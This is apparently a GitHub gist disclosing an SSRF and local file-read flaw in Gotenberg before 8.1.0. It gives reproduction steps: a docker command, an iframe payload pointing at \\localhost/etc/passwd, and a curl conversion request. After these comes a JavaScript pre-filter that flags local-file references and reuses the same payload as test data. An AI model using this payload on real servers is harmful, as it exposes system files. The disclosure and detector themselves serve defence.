@filipochnik
Created February 22, 2024 15:37
Gotenberg SSRF

Description

Affected versions of github.com/gotenberg/gotenberg (<8.1.0) are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">.

Steps to reproduce:

  1. Start Gotenberg:

$ docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg

  2. Create an index.html file with the following contents:

<head>
    <body>
        <iframe src="\\localhost/etc/passwd">
    </body>
</head>

  3. Convert index.html to PDF:

$ curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf

  4. Open output.pdf; it will include the contents of /etc/passwd.

Fix

The issue has been fixed in version 8.1.0 with this commit
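
A pre-conversion check for the reference form used in the reproduction steps, added here as an example (it is not part of the gist or of Gotenberg, and is separate from the 8.1.0 fix). It resolves each src/href value against a file: base with Node's WHATWG URL parser and flags anything that lands outside the working directory; BASE, ALLOWED_DIR and the sample markup are assumptions.

```javascript
// Added example, not Gotenberg code. BASE and ALLOWED_DIR are hypothetical:
// they stand for wherever the renderer stores the uploaded index.html.
const BASE = 'file:///tmp/render/index.html';
const ALLOWED_DIR = '/tmp/render/';

// Pull src/href values out of the markup (quoted or unquoted). Regex extraction
// is a coarse pre-filter: it does not see CSS url() or script-built references.
function extractRefs(html) {
  const re = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  return [...html.matchAll(re)].map((m) => m[1] ?? m[2] ?? m[3]);
}

// Resolve a reference against a file: base with the WHATWG URL parser, which
// treats "\" as "/" for file URLs, so "\\host/path" is scheme-relative.
function classify(ref) {
  let u;
  try {
    u = new URL(ref, BASE);
  } catch {
    return { ref, resolved: null, verdict: 'unparseable' };
  }
  if (u.protocol !== 'file:') return { ref, resolved: u.href, verdict: 'non-file' };
  // Inside the working directory only if there is no host part, the normalized
  // path stays under ALLOWED_DIR, and no encoded "/", "\" or "." could hide a climb.
  const inside = u.host === '' &&
    u.pathname.startsWith(ALLOWED_DIR) &&
    !/%(2f|5c|2e)/i.test(u.pathname);
  return { ref, resolved: u.href, verdict: inside ? 'allow' : 'local-file' };
}

// Return every reference that must not reach the renderer.
function screen(html) {
  return extractRefs(html)
    .map(classify)
    .filter((r) => r.verdict === 'local-file' || r.verdict === 'unparseable');
}

// Constructed sample: the iframe from the reproduction steps plus benign references.
const sample = String.raw`<html><body>
  <iframe src="\\localhost/etc/passwd"></iframe>
  <img src="logo.png">
  <link href='https://example.com/site.css' rel=stylesheet>
  <a href=../../etc/hosts>x</a>
</body></html>`;

for (const r of screen(sample)) console.log(r.verdict, r.ref, '->', r.resolved);
```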